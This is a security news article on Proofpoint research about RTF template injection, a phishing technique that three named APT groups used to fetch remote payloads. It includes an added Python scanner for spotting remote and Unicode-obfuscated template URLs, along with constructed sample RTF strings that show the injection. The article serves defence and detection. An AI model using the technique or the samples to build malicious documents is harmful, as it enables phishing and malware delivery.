APTs Leverage New RTF Phishing Tactic
Three APTs have been observed using RTF template injection, and researchers warn more threat groups may adopt the new tactic.

Researchers are warning of a new phishing attack technique, where attackers leverage a legitimate template functionality in the Rich Text Format (RTF) file format in order to retrieve malicious payloads from a remote URL.

The attack was observed as early as January, but since then researchers with Proofpoint have observed advanced persistent threat (APT) actors increasingly adopting the phishing tactic in the second and third quarter of 2021. Researchers warn that the simplicity of the attack, which they call RTF template injection, sets it up for further widespread use by less sophisticated cybercriminals.

“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” said researchers with Proofpoint on Wednesday.

The attack stems from the document formatting control word for the “*\template” structure, which is part of RTF's plain text document formatting properties. The first part of this structure's value designates a destination, and the second part designates the specific control word function; together, these values point to the location of a legitimate template file to be retrieved. However, it is trivial for attackers to alter the bytes of an existing RTF file and insert a template control word destination that includes a URL resource instead of an accessible file resource destination. In a real-life attack that would allow a remote payload to be fetched when victims open either .rtf files or .doc.rtf files (RTF files that are opened using Microsoft Word).

This tactic is different from how malicious RTF objects have historically been utilized by cybercriminals. Many of these common attacks include overlay data, or additional data appended to the end of RTF files, in order to embed decoy files that execute attacker-controlled code. For instance, in June, an APT was found sending victims phishing emails that contained RTF files embedded with the RoyalRoad weaponizer.

“While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques,” said researchers.

This year, researchers observed three APT actors utilizing RTF template injection. The DoNot Team APT group, which has been suspected of being aligned with Indian state interests, was observed leveraging the technique between February and July. The APT’s emails used “defense proposal” lures and appeared to target entities in Pakistan and Sri Lanka. In this attack, the threat group included the template formatting property within a preexisting list override table in the RTF file, which governs the formatting of various document features (such as headers or footers). Specifically, the malicious template control word is embedded in the “wgrffmtfilters” font family control word, said researchers. The APT also utilized a Unicode signed character notation in order to obfuscate the URL value of the RTF file, which researchers believe is a way to evade static detection signatures in antivirus software.

“The ability of RTF files to parse these signed 16-bit Unicode characters provides actors an alternative to using plaintext strings containing a URL, which allows for easy analysis of malicious samples upon detection,” said researchers.
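As an added example that is not part of the original report or of Proofpoint's tooling, the following scanner shows how a defender can surface the two behaviours described above: a `\*\template` destination group whose value is a remote URL, and a URL split into signed 16-bit `\uN` escapes. The sample documents, the `.invalid` hostname and the helper names are constructed for illustration.

```python
import re

# Signed 16-bit Unicode escape \uN, optionally followed by one fallback
# character (a plain char or a \'hh hex escape) that readers show when they
# cannot render the code point. Assumes the default \uc1 fallback length.
UNICODE_ESCAPE = re.compile(r"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|[^\\{}])?")

# The {\*\template ...} destination group; its body is read up to the closing
# brace, wherever in the document the group happens to be nested.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\b([^{}]*)\}")

# Remote resource schemes that a template destination has no reason to use.
REMOTE_URL = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"'{}]+")


def looks_like_rtf(data: bytes) -> bool:
    """RTF is identified by content, not extension: .doc.rtf still starts {\\rtf."""
    return data.lstrip().startswith(b"{\\rtf")


def decode_rtf_unicode(text: str) -> str:
    """Replace each \\uN escape with its code point and drop the fallback char."""
    def repl(m: re.Match) -> str:
        n = int(m.group(1))
        return chr(n + 0x10000 if n < 0 else n)  # negative N encodes 0x8000-0xFFFF
    return UNICODE_ESCAPE.sub(repl, text)


def find_remote_templates(rtf: str) -> list[str]:
    """Return every remote URL found in a \\template destination, decoding
    Unicode escapes first so a URL hidden behind \\uN escapes is reassembled."""
    urls = []
    for group in TEMPLATE_GROUP.finditer(rtf):
        body = decode_rtf_unicode(group.group(1))
        urls.extend(u.group(0) for u in REMOTE_URL.finditer(body))
    return urls


# Constructed samples (not real malware): one plaintext URL, one where the
# scheme is hidden behind \uN escapes, and one benign local template path.
SAMPLE_PLAIN = r'{\rtf1\ansi{\*\template "http://template.example.invalid/t.dotm"}\par Hello}'
SAMPLE_UNICODE = (r'{\rtf1\ansi{\*\template \u104?\u116?\u116?\u112?\u58?\u47?\u47?'
                  r'template.example.invalid/t.dotm}\par Hello}')
SAMPLE_BENIGN = r'{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}\par Hello}'

if __name__ == "__main__":
    for name, sample in [("plain", SAMPLE_PLAIN), ("unicode", SAMPLE_UNICODE), ("benign", SAMPLE_BENIGN)]:
        print(name, find_remote_templates(sample))
```

Any non-empty result is worth alerting on, since a template destination that resolves to a remote host is the behaviour the report attributes to all three campaigns.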

Between April and September, researchers observed TA423, a China-related APT actor, send phishing emails that targeted the Malaysian deep water energy exploration sector and contained RTF files as attachments. These RTF files included remote template injection URLs in plaintext, which referenced external content in plain sight in the strings of the attachments.

“Of note is that this threat actor also weaponized the RTF files by using a different section of the document formatting properties than was previously observed among the DoNot Team campaigns,” said researchers. “This actor chose to modify a preexisting enclosing group with a font family control word rather than the wgrffmtfilters group previously discussed.”

Most recently, on Oct. 5 the Gamaredon APT actor was observed leveraging the tactic in emails that utilized Ukrainian governmental file lures. The APT, linked to the Russian government, utilized RTF template injection documents that communicated with an external domain. In this attack, Microsoft Office documents used the remote template injection tactic to retrieve the malicious payloads, and in some cases used an MP3 file as a delivery resource. Gamaredon also used this tactic alongside several other attachment delivery methods - including Office and XML template documents - that all shared a single URL, leading researchers to believe the APT is experimenting with new file types.

Researchers said that this new phishing method is an expanding threat surface for organizations globally, and they expect it to be utilized by less sophisticated threat actors in addition to APTs.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” said researchers.